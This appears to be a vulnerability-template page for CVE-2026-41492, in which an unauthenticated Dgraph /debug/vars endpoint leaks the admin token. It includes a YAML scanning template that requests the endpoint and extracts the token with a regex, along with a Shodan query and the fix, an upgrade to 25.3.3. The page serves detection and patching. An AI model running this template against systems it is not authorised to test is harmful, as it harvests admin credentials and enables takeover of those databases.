Dgraph <= 25.3.2 - Admin Token Disclosure
CVE-2026-41492
Verified
Description
Dgraph <= 25.3.2 contains an information disclosure caused by unauthenticated access to the /debug/vars endpoint , which publishes the cmdline variable including the --security token= flag, letting unauthenticated remote attackers retrieve the admin token and access admin-only endpoints, exploit requires no authentication.
Severity
Critical
CVSS Score
9.8
Exploit Probability
3%
Affected Product
dgraph
Published Date
April 29, 2026
Template Author
divine balija
CVE-2026-41492.yaml
id: CVE-2026-41492
info:
name: Dgraph <= 25.3.2 - Admin Token Disclosure
author: Divine Balija
severity: critical
description: |
Dgraph <= 25.3.2 contains an information disclosure caused by unauthenticated access to the /debug/vars endpoint , which publishes the cmdline variable including the --security token= flag, letting unauthenticated remote attackers retrieve the admin token and access admin-only endpoints, exploit requires no authentication.
impact: |
Unauthenticated attackers can retrieve the admin token and gain full administrative control over the Dgraph instance.
remediation: |
Update to Dgraph version 25.3.3 or later.
reference:
- https://github.com/dgraph-io/dgraph/security/advisories/GHSA-vvf7-6rmr-m29q
- https://nvd.nist.gov/vuln/detail/CVE-2026-41492
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-41492
epss-score: 0.03082
epss-percentile: 0.86645
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
vendor: dgraph
product: dgraph
shodan-query: "Dgraph"
tags: cve,cve2026,dgraph,exposure,token
http:
- method: GET
path:
- "{{BaseURL}}/debug/vars"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "cmdline"
- "token="
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'token=([^"\\]+)'
# digest: 490a004630440220473b6e31269ebe707c5a29608f19836873f44a2237a567c1e42fa42c2f90bb0c022003e8de7cfa27d4d7d5c775c4ca9abf1cb37a1fd3170a8f82c9fb59c55ff68cde:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-41492
CWE ID:
cwe-200
Remediation Steps
Update to Dgraph version 25.3.3 or later.